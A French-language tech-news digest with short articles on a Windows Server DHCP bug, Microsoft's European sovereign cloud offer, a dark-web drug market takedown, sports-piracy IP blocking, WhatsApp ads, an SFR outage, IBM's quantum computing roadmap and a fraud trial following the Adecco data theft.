Le 10 juin, Microsoft déployait ses correctifs mensuels de sécurité, le fameux Patch Tuesday. Celui-ci corrigeait des dizaines de failles de sécurité, comme à peu près tous les mois. À ce moment, un seul problème était connu, un souci d’affichage pour la famille de polices Noto, qui apparaissaient comme floues dans certaines conditions.

L’éditeur a cependant mis à jour sa fiche pour ajouter un problème nettement plus sérieux. Les versions 2016, 2019, 2022 et même 2025 de Windows Server peuvent provoquer un défaut avec le serveur DHCP du système, qui fonctionne alors « par intermittence ». Le problème peut engendrer une belle pagaille dans les entreprises, car ce composant est responsable de la distribution dynamique d’adresses IP aux appareils connectés au réseau.

Sur Reddit, le sujet tourne depuis des jours, provoquant la colère d’un grand nombre d’utilisateurs. Il n’y a pour l’instant aucune solution et, facteur aggravant, Microsoft n’a pas communiqué tout de suite. Une mise à jour de la page indique désormais : « Nous travaillons à la publication d’une résolution dans les prochains jours et fournirons plus d’informations dès qu’elle sera disponible ».

Comme souvent avec les problèmes liés aux mises à jour de Windows, le cas relance les discussions sur l’assurance qualité de Microsoft et le temps que l’éditeur consacre aux tests de ses correctifs. Le problème avait empoisonné une partie du cycle de vie de Windows 10, et la situation ne s’est guère améliorée sous Windows 11. Sur ce dernier, la mise à jour majeure 24H2 a eu son lot de problèmes, avec un déploiement complexe, qui s’achève tout juste, et un nombre important de soucis techniques.

La vie en Bleu

La société vient d’annoncer la disponibilité, en avant-première, d’un nouveau programme en Europe. Conçu a priori pour répondre aux inquiétudes de souveraineté, le programme fait la promesse de données restent au sein des frontières de l’Union et donne des assurances sur le personnel. Problème, Microsoft ne peut pas garantir de protection contre la portée extraterritoriale des lois américaines sur son cloud public.

Microsoft joue la carte de l’entente et du bon élève avec l’Europe. Contrairement à Apple, par exemple, qui fustige largement le DMA et compte lutter jusqu’au bout, Microsoft a dévoilé tout un plan visant à répondre à diverses inquiétudes. « Une drôle de déclaration d’amour », titrions-nous, avec de nombreuses annonces sur la cybersécurité et la souveraineté notamment.

La semaine dernière, l’éditeur est revenu communiquer sur l’Europe, cette fois pour détailler ses renforcements dans la cybersécurité. La société a ainsi mis en place un réseau de collaboration dans lequel elle s’engage à fournir un plus grand nombre d’informations aux pays membres de l’Union, un état des menaces en quasi-temps réel. Elle a également renforcé sa coopération avec Europol, via sa propre Digital Crime Unit. Un investissement dont on imagine que la firme attend beaucoup, avec des retombées positives, au moins en matière d’image.

Mais Microsoft était surtout attendue sur le terrain de la souveraineté. La société vient d’annoncer une série de mesures, sans toutefois aborder certains sujets qui fâchent.

Tir groupé

Les annonces visent à la fois le cloud public et le cloud privé. Pour rappel, le premier est le cloud classique tel qu’on le connait : les données et services des clients sont placés dans des structures mutualisées et réparties potentiellement dans de nombreux centres. Dans le cloud privé, ces informations et développements sont stockés sur des ressources dédiées, auxquelles ne peut accéder que le client (et l’hébergeur). Pour des données et applications exclusivement sur les sites des utilisateurs, on parle de « on-premise », ou « installation sur site ».

La principale annonce de Microsoft est le Sovereign Private Cloud (appellation commerciale de Microsoft, regroupant des engagements et des produits), qui sera finalisé et pleinement disponible avant la fin de l’année, dans toutes les régions de l’Union où Microsoft possède des centres de données. L’ensemble des clients européens pourront en profiter s’ils en font la demande, l’annonce se répercutant sur tous les services liés dont Azure, 365, Security et Power Platform.

« Sovereign Private Cloud garantit que les données des clients restent en Europe, sous la loi européenne, avec des opérations et un accès contrôlés par le personnel européen, et que le chiffrement est sous le contrôle total des clients. Cela est possible pour toutes les charges de travail des clients fonctionnant dans nos régions de centres de données européens et ne nécessitant aucune migration », revendique Microsoft.

Quelles mesures ?

L’entreprise présente une série de mesures concrètes. L’une des plus importantes est mentionnée dans la déclaration précédente : la garantie de pouvoir utiliser ses propres clés de chiffrement. Cela signifie, dans ce cas, que les données ainsi chiffrées ne sont pas lisibles par Microsoft.

C’est une généralisation d’Azure Managed HSM (Hardware Security Module). Microsoft dit travailler avec tous les principaux constructeurs HSM pour s’assurer leur support, dont Futurex, Thales et Ultimaco. En théorie, cela signifie que l’implémentation de stocker ces clés où le client le souhaite. C’est aujourd’hui un élément essentiel de la sécurité et de la confidentialité des données, mais il n’est pas suffisant à lui seul, comme on le verra.

On trouve ensuite Data Guardian, qui doit garantir que seul le personnel de Microsoft résidant en Europe « contrôle l’accès à distance à ces systèmes ». En clair, cela signifie que si des ingénieurs situés hors d’Europe ont besoin d’un accès pour des raisons techniques, le personnel européen surveillera l’opération. Cette dernière sera consignée dans un registre que Microsoft décrit comme « inviolable ».

Microsoft limite donc l’accès au personnel européen, mais sans distinction de leur (éventuellement double) nationalité. Thales a la volonté d’aller plus loin, pour rappel, pour le personnel critique de S3ns : « je pense que la nationalité américaine ne sera pas possible pour rester immunisé », expliquait le RSSI de Thales Ivan Maximoff.

Microsoft met aussi en avant Azure Local et Microsoft 365 Local. Il s’agit de versions spécifiques de ses offres pour les clouds privés. Elles ne contiennent pas l’intégralité des fonctions et services, mais sont présentées comme taillées pour des besoins spécifiques. « Certains scénarios exigent que certaines charges de travail soient exécutées dans un environnement physique sous le contrôle total du client afin de soutenir l’atténuation des risques liés à la continuité de l’activité », indique ainsi l’entreprise.

Ces services sont placés dans les locaux des clients, sur leurs infrastructures matérielles ou celle d’un hébergeur de leur choix. Microsoft fournit en somme la solution logicielle et les mises à jour, mais ne gère pas les services, ce qui va plus loin que la classique définition du cloud privé. Et si ce fonctionnement vous rappelle quelque chose, c’est qu’il correspond à celui de Bleu.

50 nuances de bleu

Microsoft met en avant le partenariat ayant donné naissance à Bleu : « En France, nous avons conclu un accord avec Bleu, une coentreprise entre Orange et Capgemini, pour que Bleu exploite un « cloud de confiance » pour le secteur public français, les fournisseurs d’infrastructures critiques et les fournisseurs de services essentiels, conçu pour répondre aux exigences de SecNumCloud ».

En somme, l’annonce d’aujourd’hui revient à généraliser ce fonctionnement aux clients qui en font la demande. Et qui en ont les moyens, puisque qu’il faut fournir soi-même l’infrastructure.

La référence à SecNumCloud n’est pas non plus anodine. Ce qui permet notamment à Microsoft de déclarer : « Private Sovereign Cloud est conçu pour les gouvernements, les industries critiques et les secteurs réglementés qui doivent respecter les normes les plus strictes en matière de résidence des données, d’autonomie opérationnelle et d’accès déconnecté ».

Cloud très public

Si on suit les déclarations et annonces de Microsoft, l’écart entre cloud public et privé se creuse. On se rappelle en effet que Microsoft a reconnu au Royaume-Uni qu’il était impossible de garantir la souveraineté des données stockées par la police écossaise chez Microsoft.

La portée extraterritoriale de certaines lois américaines, tout particulièrement les Cloud Act et FISAA, l’en empêche. Aux États-Unis, Microsoft est tenue juridiquement de fournir les données demandées dans le cadre des enquêtes criminelles, en théorie après validation d’un mandat par un juge. Y compris quand lesdites données sont sur des serveurs physiquement hors des frontières états-uniennes.

Or, cette déclaration a également été faite la semaine dernière en France. Anton Carniaux, directeur des affaires publiques et juridiques de Microsoft France, était entendu par une commission d’enquête sénatoriale sur les coûts et modalités effectifs de la commande publique. Face à une question claire, et sous serment, sur la garantie que les données françaises ne quitteraient pas le territoire « sans l’accord explicite des autorités françaises », le responsable a répondu : « Non, je ne peux pas le garantir, mais aujourd’hui ce n’est pas arrivé ».

Sur la question du « cloud privé » en revanche, la situation est a priori plus simple. Si l’on en croit Vincent Strubel, directeur de l’ANSSI et lui-même auditionné au Sénat début juin, Bleu ne sera justement pas concernée par la portée extraterritoriale des lois américaines. La structure est équipée en solutions logicielles de Microsoft, mais s’occupe d’opérer elle-même ses traitements. L’ANSSI a affirmé que rien ne s’opposait à sa qualification SecNumCloud, pas plus qu’à celle de S3ns. Cette dernière s’est lancée dans la procédure en juillet dernier et attend le dénouement cet été. Bleu est entré dans le processus plus tard, en avril 2025 et s’attend à une qualification au premier semestre 2026.

• SecNumCloud : pour l’ANSSI, « rien ne s’oppose » à la qualification de Bleu et S3ns

Vincent Strubel a également rappelé qu’il n’y avait pas d’autre solution pour se protéger du droit à portée extraterritoriale que d’utiliser des produits qui n’y sont pas soumis. « Le chiffrement, la localisation des données et l’anonymisation, ça complique peut-être les choses, mais ça ne rend pas impossible la captation des données », avait ainsi déclaré le directeur de l’ANSSI. L’annonce de Microsoft sur les clés de chiffrement est donc importante, mais ne bloque pas en elle-même l’accès aux données.

Après la carte nationale d’identité (au format carte bancaire) et le permis de conduire, c’est au tour de la carte grise de faire son entrée sur France Identité. Pour l’instant, cette nouveauté est réservée aux versions bêta de l’application pour iOS (via TestFlight, mais les places sont prises depuis longtemps) et Android.

Comme le rappellent nos confrères d’iGen, l’arrivée de cette fonction était prévue pour 2026. On ignore combien de temps va durer la phase de test, mais la carte grise sera peut-être en avance sur le programme.

Si l’on en croit les retours sur X, l’ajout de la carte grise semble bien se passer, des utilisateurs appréciant cet ajout. Il y a cependant une condition à respecter : que le véhicule soit muni d’une plaque au format AA-123-AA, donc immatriculé après 2009.

Comme on peut le voir chez nos confrères, la nouvelle version de l’application modifie l’écran d’accueil pour mieux refléter les cartes ajoutées. L’identité numérique apparait sur la moitié supérieure, tandis que le permis de conduire et la carte grise sont sur la seconde. La génération de justificatif, elle, est déportée dans le menu de la carte d’identité.

Fin de partie

Europol et les forces de police allemandes ont annoncé lundi la saisie des infrastructures informatiques d’Archetyp Market et l’arrestation de ses principaux administrateurs. Le site, accessible uniquement via le réseau TOR, opérait depuis 2020 comme une place de marché dédiée à l’achat de drogues.

Les administrateurs d’Archetyp Market, célèbre supermarché du dark web dédié à l’achat et à la vente de drogues illicites, seraient-ils partis avec la caisse ? L’hypothèse a circulé ces derniers jours sur les réseaux sociaux, après que le site fut soudainement apparu comme « en maintenance ». Ceux qui craignaient un exit scam (escroquerie de sortie) ont peut-être maintenant d’autres motifs d’inquiétude : Europol a en effet annoncé lundi la mise hors service du site et l’arrestation de plusieurs de ses administrateurs, suite à une opération baptisée Deep Sentinel.

L’un des nombreux successeurs de Silk Road

Le coup de filet a été réalisé entre le 11 et le 13 juin, indique Europol, avec une action conjointe et simultanée dans cinq pays. Les infrastructures du site, basées aux Pays-bas, ont été saisies, tandis qu’un des responsables du site, un Allemand de trente ans, a été arrêté à Barcelone. L’opération a par ailleurs permis d’arrêter l’un des modérateurs du site, mais aussi six des plus gros vendeurs actifs sur la plateforme.

Le site et son forum comptaient 600 000 utilisateurs enregistrés, et auraient permis de réaliser l’équivalent de 250 millions d’euros de transaction, affirment les forces de police. La place de marché (marketplace) référençait quelque 17 000 produits illégaux, majoritairement des drogues. Parmi les différentes adresses spécialisées du dark web, Archetyp Market se distinguait notamment par sa tolérance vis-à-vis de la vente de fentanyl, souvent proscrit chez les concurrents, note Europol.

Le fondateur d’Archetyp Market s’était livré dans une longue interview en 2021 (en allemand). Il y expliquait avoir été inspiré par les idéaux libertariens de Ross Ulbricht, le fondateur du célèbre Silk Road. Il y revendiquait également le piratage, survenu en 2020, d’une autre place de marché du dark web, le site Pax Romana, et promettait des garanties sérieuses en matière de sécurité et de protection de l’anonymat de ses utilisateurs, vendeurs comme acheteurs. Il y expliquait enfin avoir choisi la cryptomonnaie Monero pour les flux financiers de son site, et arguait qu’il n’était pas possible de remonter sa trace par ce biais.

« Ce démantèlement fait suite à des années d’enquêtes intensives visant à cartographier l’architecture technique de la plateforme et à identifier les individus qui se cachent derrière. En traçant les flux financiers, en analysant les preuves numériques et en collaborant étroitement avec des partenaires sur le terrain, les autorités ont pu porter un coup décisif à l’un des marchés de la drogue les plus prolifiques du dark web », commente de son côté Europol.

Une communication très Cyberpunk 2077

Lundi, l’adresse d’Archetyp Market répond toujours, mais une fois passé le captcha qui fait office de sas d’entrée, le site n’affiche plus qu’un visuel annonçant la saisie par les forces de police et renvoyant vers le site dédié à l’opération Deep Sentinel.

Ce site, édité par l’Office fédéral de police criminelle allemand (BKA), est l’occasion pour les forces de l’ordre d’adresser un message aux éditeurs de sites concurrents. Plutôt qu’un texte lénifiant, il prend la forme d’une courte vidéo (2 minutes) aux codes graphiques directement inspirés du jeu Cyberpunk 2077. Elle souligne à quel point il est simple de lancer un site pour peu qu’on se pique de compétences techniques, avant bien sûr de mettre en avant la riposte policière.

• L’administrateur d’Incognito Market avait viré des cryptos « anonymisés » sur son compte perso

IPTVu, IPTpris

Alors que le Sénat a adopté à la quasi-unanimité la proposition de loi sur le sport professionnel, les ayant-droits cherchent à déployer un système de blocage des sites de piratage bien plus ambitieux.

Le 10 juin, le Sénat adoptait la proposition de loi relative à l’organisation, à la gestion et au financement du sport professionnel. Issu de la mission d’information « Football-business : stop ou encore », le texte déposé par le sénateur centriste Laurent Lafon a été adopté par 338 voix contre 1.

Rôle renforcé des fédérations et du ministère des Sports dans la gouvernance de ligues professionnelle, redistribution des revenus audiovisuels, plafonnement des rémunérations pour les dirigeants et lutte contre le piratage sont au nombre des sujets abordés par la proposition de loi. Sur cette dernière thématique, l’Arcom relevait un manque à gagner de 290 millions d’euros en 2023, soit 15 % de parts de marché, souligne Public Sénat.

Accélérer les modalités de blocage

L’article 10 du texte met à jour la procédure judiciaire et administrative en vigueur depuis le 1ᵉʳ janvier 2022. Depuis cette date, les chaînes et ligues sportives qui constatent des atteintes à leurs droits audiovisuels sont en mesure de saisir la justice pour réclamer le blocage de sites pirates. Ils peuvent ensuite saisir l’Autorité de régulation de la communication audiovisuelle et numérique (Arcom) pour mettre à jour la liste noire des noms de domaines pirates.

À l’heure actuelle, rappelle L’Informé, ce blocage qualifié de « dynamique » concerne les fournisseurs d’accès français (Orange, Free, SFR, Bouygues Télécom, les trois fournisseurs de DNS (systèmes de noms de domaine) que sont Google, Cisco et Cloudflare, ainsi que plusieurs fournisseurs de VPN (réseaux privés virtuels), dont NordVPN ou Proton, depuis quelques semaines.

• Streaming sportif : Canal+ et la LFP obtiennent 200 blocages par les VPN, BeIN galère


La proposition de loi adoptée au Sénat vise à accélérer la cadence. En l’état, le texte prévoit que les titulaires des droits de diffusion aient toujours à saisir le juge, puis soient autorisés à collecter les informations d’identification de sites pirates. En revanche, ils pourront transmettre ces données directement et automatiquement aux FAI et autres acteurs techniques pour les faire bloquer, sans passer par l’Arcom.

Les adresses IP dans le viseur

Surtout, les critères adoptés dans la proposition de loi ouvrent la voie à des blocages plus larges, via les adresses IP. D’après l’Informé, l’Association pour la Protection des Programmes Sportifs (APPS) aurait déjà trouvé un accord de blocage par IP avec les principaux FAI français – une procédure jamais mise en place en France à l’heure actuelle.

Si elle refuse de commenter ce sujet, l’APPS indique, comme la Ligue de football professionnel (LFP), vouloir se « mettre à niveau des Anglais, des Espagnols ou encore des Italiens ». La seconde souligne à l’Informé que l’Angleterre bloque « jusqu’à 10 000 adresses IP chaque week-end pour protéger la Premier League », alors que l’Arcom « a bloqué 3 797 noms de domaines en 2024 ».

Le risque, constaté en Espagne fin 2024 ou encore en Autriche en août 2022, est que ces pratiques entraînent la suspension d’autres services que les seuls sites pirates. Si le blocage décidé en justice vise un serveur mutualisé, ou que les informations transmises sont erronées, des sites légitimes pourraient en effet se retrouver hors ligne. Auprès de l’Informé, le délégué général de l’APPS assure que « tout sera mis en place » pour éviter les « risques de surblocage ».

Procédure accélérée

Le texte, qualifié d’ « urgent » par son rédacteur Laurent Lafon, face à la « crise de confiance » et « des conflits d’intérêts voire des dérives » dans le monde du football, doit désormais passer devant l’Assemblée Nationale. Le Monde précise que l’exécutif a activé la « procédure accélérée » de son examen.

Sur la question de la lutte contre le piratage, le bureau du sénateur Lafon envisage un système d’information déployé et contrôlé par l’Arcom – une piste encore en discussion.

En septembre 2023, Will Cathcart, président de WhatsApp niait l’existence de discussions dans son équipe autour de l’intégration des publicités dans WhatsApp. Comme le rappelle l’AFP, jusque-là, les seuls formats publicitaires qu’on pouvait voir dans l’application étaient des messages promotionnels envoyés via WhatsApp Business avec le consentement de l’utilisateur.

Moins de deux ans après la réaction de Will Cathcart, l’entreprise annonce officiellement cette intégration dans son application. Les publicités apparaitront dans l’onglet Actus de WhatsApp. Celui-ci regroupe les statuts et les chaines. L’entreprise, dont le billet s’adresse aux annonceurs, met en avant le fait que ses utilisateurs fréquentent en nombre cet onglet : « il est aujourd’hui utilisé par 1,5 milliard de personnes par jour dans le monde ».

L’entreprise explique qu’elle va transformer l’onglet Actus pour y ajouter trois fonctionnalités :

• L’inscription à des chaines : « Vous pourrez soutenir votre chaîne préférée, par exemple votre réseau d’information favori, en vous abonnant pour recevoir des mises à jour exclusives moyennant un montant mensuel » ;
• La promotion de chaines : « Nous vous aiderons à découvrir de nouvelles chaînes susceptibles de vous intéresser lorsque vous consulterez l’annuaire. Pour la première fois, les administrateurs de chaînes disposent d’un moyen d’accroître la visibilité de leurs chaînes » ;
• La publicité dans les statuts : « Vous pourrez trouver une nouvelle entreprise et entamer facilement une conversation avec elle au sujet d’un produit ou d’un service qu’elle promeut dans Statuts ».

Contrairement à sa communication concernant Instagram ou Facebook, Meta insiste sur le fait que l’insertion de la publicité dans WhatsApp serait ajoutée « de la manière la plus respectueuse possible de la vie privée ».

L’entreprise précise néanmoins que « pour afficher des publicités dans Statuts ou dans les chaînes qui pourraient vous intéresser, nous utiliserons des informations limitées telles que votre pays ou ville, votre langue, les chaînes que vous suivez et la façon dont vous interagissez avec les publicités que vous voyez. Pour les personnes qui ont choisi d’ajouter WhatsApp au Centre de comptes, nous utiliserons également vos préférences publicitaires et les informations de vos comptes Meta ».

Meta jure qu’elle n’utilisera pas les messages personnels, les appels et les groupes de ses utilisateurs pour déterminer les publicités qu’ils verront. « Nous ne vendrons ni ne partagerons jamais votre numéro de téléphone avec des annonceurs », promet encore l’entreprise.

Elle ne précise pas si cette insertion de publicité dans l’application concerne une zone géographique particulière.

Le gouvernement Bayrou a récemment publié les déclarations d’intérêt de ses 36 membres. Dans le lot, la ministre déléguée au numérique et à l’intelligence artificielle Clara Chappaz déclare posséder plus de 800 000 euros d’action dans 43 entreprises, soit 18 de plus que les 25 listées dans sa déclaration précédente.

Outre 74 877 euros de son ancienne société Vestiaire Collective, la ministre détient des parts dans plusieurs entreprises du secteur de la tech, avec lesquelles elle est directement susceptible d’interagir dans le cadre de ses fonctions.

C’est le cas des deux européennes ST Microelectronics (8 128 euros) et ASML (14 334 euros). Plusieurs autres de ses participations concernent les états-uniennes : Alphabet (17 425 euros), Amazon (18 705 euros), Microsoft (23 573 euros), NVIDIA (23 751 euros), ou encore le fabricant de semi-conducteurs Kla Corporation (18 677 euros).

Comme ASML, ces cinq entreprises n’étaient pas citées dans la déclaration produite alors que Clara Chappaz était ministre déléguée du gouvernement Barnier.

Selon CheckNews, « ses actions sont administrées « sous mandat de gestion », donc sans intervention possible de sa part ».

La prochaine version de la suite bureautique libre et gratuite sera la première à se débarrasser de Windows 7, 8 et 8.1. Les deux systèmes ne seront plus pris en charge, ce qui signifie que la mise à jour ne sera pas proposée sur ces systèmes. Il ne sera plus possible également d’installer la suite sur les machines concernées à partir de cette version.

La nouvelle version minimale devient ainsi Windows 10. Mais le système est dans le viseur de la Document Foundation, qui édite LibreOffice. La fondation se joint en effet à KDE dans son appel à abandonner Windows pour Linux.

Cette multiplication des communications n’est pas étonnante : l’arrêt du support de Windows 10, le 14 octobre prochain, obligera des centaines de millions de personnes à choisir entre racheter un appareil sous Windows 11 ou changer de crèmerie.

Linux est présenté comme la solution idéale, puisqu’il permet de garder le matériel existant. Un choix affiché comme vertueux, aussi bien financièrement qu’écologiquement. Comme nous le relevions cependant, il pose un sérieux problème : comment expliquer aux personnes concernées le problème, procéder au remplacement et leur apprendre de nouveaux usages ?

Au-delà de ces thématiques, la première bêta de LibreOffice 25.8 apporte son lot d’améliorations. Par exemple, l’outil Auto-Redact de Writer se dote d’une fonction de confidentialité permettant de supprimer toutes les images d’un document. Toujours dans Writer, une nouvelle règle de césure empêche les mots de se couper à la fin d’une page, décalant alors la ligne entière sur la page suivante, pour des questions de lisibilité.

Parmi les autres apports, signalons une infobulle indiquant le nombre de mots et de caractères pour les titres et sous-titres, une sélection de texte plus précise, l’ajout d’une commande pour convertir les champs en texte brut, de nouvelles fonctions pour Calc (TEXTSPLIT, VSTACK et WRAPROWS), une meilleure prise en charge des polices intégrées dans les documents PPTX, ou encore un support amélioré du mode plein écran dans macOS.

Mise à jour le 17 juin à 8h02 : SFR vient d’annoncer ce matin que « l’ensemble des services mobiles qui ont pu être impactés par l’incident d’hier ont été rétablis à 100 % ». L’opérateur annonce que les communications sont progressivement revenues dans la soirée. Aucune explication par contre sur les causes de cet incident qui a donc duré plusieurs heures.

N’hésitez pas à nous signaler dans les commentaires si la situation est revenue à la normale ce matin, où s’il persiste encore des problèmes.

---

C’est un peu le scénario catastrophe pour SFR : de nombreux clients de l’opérateur indiquent ne plus avoir accès au réseau, aussi bien sur le fixe que sur le mobile. Sur Downdetector, les signalements sont nombreux, avec des conséquences pour des opérateurs virtuels passant par le réseau de SFR.

Dans les discussions sur FRnOG aussi, des retours font état de gros problèmes sur le réseau national de SFR. La panne aurait débuté un peu avant 11 h avant d’avoir des signes de retours au moins partiels à partir de 12 h, sans que le problème ne soit pour autant réglé.

« Depuis 10h50 ce matin, SFR subit un incident majeur dans tout son réseau de collecte convergeant vers le NetCenter de Bordeaux », explique Charles Enel-Rehel, fondateur de Saclak Network. « Nous avons pas mal de régions touchées », ajoute Arnauld Peyrou, le responsable infrastructure et sécurité chez Inrap. Même son de cloche chez d’autres.

Sur les réseaux sociaux, les signalements sont très nombreux. L’opérateur a fini par réagir officiellement à 14h08 avec un message des plus laconique : « Nous vous informons qu’un incident technique impacte actuellement notre réseau. Nos équipes techniques sont pleinement mobilisées pour rétablir la situation. Nous vous prions de bien vouloir nous excuser pour la gêne occasionnée ». Message qui tourne désormais en boucle en réponse aux demandes des clients.

On note tout de même la réponse du compte officiel à 11h49 qui renvoyait vers la page d’assistance « afin de voir si une panne est en cours sur votre secteur ainsi que sa date présumée de rétablissement ». Page qui affichait alors le message suivant : « Ce service est actuellement en maintenance, nous vous invitons à revenir ultérieurement ».

Nous avons désormais aussi la liste des sites en maintenance, mais avec une mise à jour à 8:36, avant la panne. Rien concernant la panne actuelle sur cette page dédiée aux maintenances.

La ministre de la Santé et des Solidarités Catherine Vautrin compte « interdire l’exposition aux écrans pour les plus petits, de la naissance à l’âge de 3 ans », tout en admettant que les autorités ne seront « pas chez les gens pour le vérifier ».

Dans les prochaines semaines, elle prévoit de publier « un arrêté interdisant les écrans dans les lieux d’accueil des enfants de moins de 3 ans », rapporte Libération.

La ministre décrit ce projet comme une manière « d’insuffler l’idée que ça ne se fait pas ». Elle compare l’arrêté à « l’interdiction de la fessée » : quand bien même la police n’est pas allée vérifier le respect de la règle, cette dernière a « fini par ancrer l’idée qu’on ne tape pas un enfant, même d’une « petite fessée » ».

Entré en vigueur au 1ᵉʳ janvier, le dernier carnet de santé stipule qu’il ne faut « pas d’écran avant 3 ans », et en préconise un usage « occasionnel, limité à des contenus à qualité éducative et accompagné par un adulte » pour les 3 années suivantes.

Les propos de la ministre font suite à une alerte de cinq sociétés savantes alertant contre les dangers de l’exposition aux écrans avant six ans.

Un an plus tôt, plusieurs de ses signataires avaient remis à Emmanuel Macron un rapport et 29 recommandations sur l’usage des écrans. Ils y préconisaient notamment de ne pas y exposer les enfants de moins de 3 ans.

Il y a le bon qubit et le mauvais qubit

Lors du salon Vivatech de la semaine dernière, IBM a présenté son projet de construction d’un « premier ordinateur quantique à grande échelle et tolérant aux erreurs ». Maintenant que la solution technique est trouvée, la mise en œuvre peut commencer, avec des étapes intermédiaires jusqu’en 2029.

IBM a présenté sa nouvelle feuille de route pour arriver à son objectif de passer à 200 qubits en 2029 (puce Starling) puis à 2 000 qubits (puce Blue Jay) à partir de 2033… On pourrait presque penser que cela n’a rien de bien exceptionnel alors que la puce Heron d’IBM est déjà à 133 qubits et même 156 dans sa version R2.

Mais ce serait aller trop vite en besogne puisqu’on ne parle pas des mêmes qubits. Avec les puces actuelles, ce sont des qubits physiques : un qubit utile sur Heron par exemple, correspond à un qubit physique sur le processeur.

• [FAQ] Notre antisèche sur l’informatique quantique

200 puis 2 000 qubits logiques

Avec Starling et Blue Jay, IBM parle de qubits logiques. Chaque qubit logique est constitué de plusieurs (dizaines, centaines, milliers…) de qubits physiques. Dans le cas de Starling et Blue Jay, IBM ne souhaite pas communiquer le nombre de qubits physiques sous-jacents dans les deux puces.

Multiplier les qubits physiques pour un seul qubit logiques permet de réduire les taux d’erreurs, un problème important de l’informatique quantique. Si un qubit logique est constitué de 100 qubits physiques et que 98 d’entre eux indiquent une même valeur, ce sera celle utilisée par le qubit logique.

On réduit ainsi mathématiquement le taux d’erreur, ils sont même « supprimés de manière exponentielle avec la taille du groupe [de qubits physiques], ce qui leur permet d’effectuer un plus grand nombre d’opérations », affirme IBM. Cette dernière est loin d’être la seule société à faire ainsi, c’est une approche on ne peut plus classique dans le monde des calculateurs quantiques.

De 100 millions à 1 milliard de portes quantiques

Fin 2024, IBM rappelait à juste titre qu’il n’y avait pas que le nombre de qubits à prendre en compte pour estimer la puissance des machines quantiques, il faut aussi connaitre le nombre de portes utilisables pendant les calculs.

Avec Starling et ses 200 qubits, IBM annonce 100 millions de portes en 2029. À partir de 2033, avec Blue Jay et ses 2 000 qubits, ce sera un milliard de portes. C’est un passage à l’échelle important puisque la puce Heron de 2024 (133 qubits physiques) est donnée pour 5 000 portes « seulement ».

• Informatique quantique : IBM rappelle qu’il n’y a pas que les qubits dans la vie

Des portes, il en faut en quantité pour avoir des algorithmes réellement utilisables dans la pratique. Prenons l’exemple de l’algorithme de Shor permettant de « casser » la cryptographie asymétrique (type RSA). Il fait beaucoup parler de lui, mais nous sommes encore loin de pouvoir l’utiliser pour casser du chiffrement sur des milliers de bits.

Vivien Londe (spécialiste quantique chez Microsoft, ex-doctorant Inria) remettait l’église au centre du village il y a quatre ans déjà : il faudrait un « ordinateur quantique de 6 000 qubits parfaits [c‘est-à-dire une puce avec 6 000 qubits logiques, ndlr] et capable de faire de l’ordre de 10 milliards d’opérations » pour mettre « en danger tout un pan de la cryptographie actuelle ». On s’en approchera seulement à partir de 2033 selon la roadmap IBM.

• Informatique quantique, algorithme de Shor : le « casseur » de cryptographie… en théorie

La solution d’IBM, en deux temps

Réussir à multiplier les qubits physiques pour obtenir des qubits logiques les plus « fiables » possibles (en réduisant au maximum le taux d’erreur) est donc tout l’enjeu moderne des ordinateurs quantiques. IBM semble confiant d’arriver à un ordinateur « tolérant aux erreurs ». Si le taux ne sera a priori jamais de 100 %, il est question de 99,9999… avec « plein de 9 » derrière la virgule, nous confirme IBM.

Pour le géant américain, « la création d’un nombre croissant de qubits logiques capables d’exécuter des circuits quantiques, avec le moins de qubits physiques possible, est essentielle pour l’informatique quantique à grande échelle. Jusqu’à aujourd’hui, aucune voie claire vers la construction d’un tel système tolérant aux erreurs sans des frais d’ingénierie irréalistes n’a été publiée ».

IBM affirme justement avoir dépassé un cap sur cette problématique avec la publication d’un article sur des « codes de contrôle de parité à faible densité quantique (qLDPC : quantum low-density parity check) ». Ils permettent de réduire « considérablement le nombre de qubits physiques nécessaires à la correction d’erreurs et réduit les coûts additionnels requis d’environ 90 % par rapport aux autres codes à la pointe ».

Dans un second article, IBM explique « comment décoder efficacement les informations provenant des qubits physiques et trace une voie pour identifier et corriger les erreurs en temps réel avec des ressources informatiques conventionnelles ».

Quantum Loon, Kookaburra et Cockatoo

La nouvelle feuille de route d’IBM prévoit trois étapes intermédiaires avant d’arriver à Starling en 2029.

La première baptisée Quantum Loon est prévue pour 2025. Ce processeur « est conçu pour tester les composants de l’architecture pour le code qLDPC, notamment les « coupleurs de type C » qui connectent les qubits sur de plus longues distances au sein d’une même puce ».

L’année prochaine, ce sera au tour de Kookaburra. Il s’agira du « premier processeur modulaire d’IBM conçu pour stocker et traiter des informations codées ». Il combine une mémoire quantique avec des opérations logiques, « ce qui constitue la base de la mise à l’échelle de systèmes tolérants aux erreurs au-delà d’une seule puce ».

D’autres fabricants travaillent sur de la mémoire quantique, notamment pour connecter entre eux différentes machines quantiques, mais aussi pour transmettre de l’informatique en mode quantique. Nous y reviendrons dans un prochain article.

En 2027, le processeur Cockatoo sera un peu la concrétisation des travaux précédents. Il « intriquera deux modules Kookaburra à l’aide de « coupleurs de type L ». Cette architecture reliera les puces quantiques entre elles comme les nœuds d’un système plus vaste, évitant ainsi la nécessité de construire des puces de taille irréaliste ».

« Ensemble, ces avancées sont conçues pour aboutir à Starling en 2029 », affirme IBM en guise de conclusion.

72 000 victimes de prélèvements frauduleux et d’arnaques, 2 400 parties civiles, deux amphithéâtres d’université et une web radio en continu pour les accueillir en plus de la salle d’audience…

Le procès qui s’ouvre aujourd’hui à Lyon, dans lequel 14 hommes font face à 22 chefs de mise en examen parmi lesquels celui d’ « escroquerie en bande organisée », est d’une dimension rare.

Il a pu s’ouvrir à la suite de l’arrestation d’un stagiaire puis alternant d’une agence Adecco de Besançon, explique La Charente Libre. Dix mois plus tard, les enquêteurs avaient réussi à débrouiller l’écheveau de discussions et de réseaux animés sur le darkweb pour orchestrer des escroqueries en tous genres : fausses demandes de MaPrime Rénov, de Chèques Vacances, de Pass Culture, d’assurance-vie…

• Arnaques financières en ligne : un « phénomène massif », difficile à endiguer


L’affaire avait débuté en 2022, lorsque la filiale française de la société d’intérim Adecco subit un vol massif de données. En juin, le stagiaire qui sera finalement arrêté livre ses identifiants et mots de passes à « Abeloth », un pseudonyme utilisé en ligne.

Cinq mois plus tard, Adecco porte plainte, alors que plus de 32 000 intérimaires se sont vu prélever des sommes de 49,85 euros, juste sous le seuil d’autorisation préalable, et que 40 000 autres ont subi des tentatives de prélèvements bloquées à temps ou remboursées par les banques. 


Les données saisies ont aussi permis au fameux « Abeloth » et à son réseau de fabriquer de fausses cartes Vitale et des comptes bancaires dédiées au blanchiment des fonds volés.

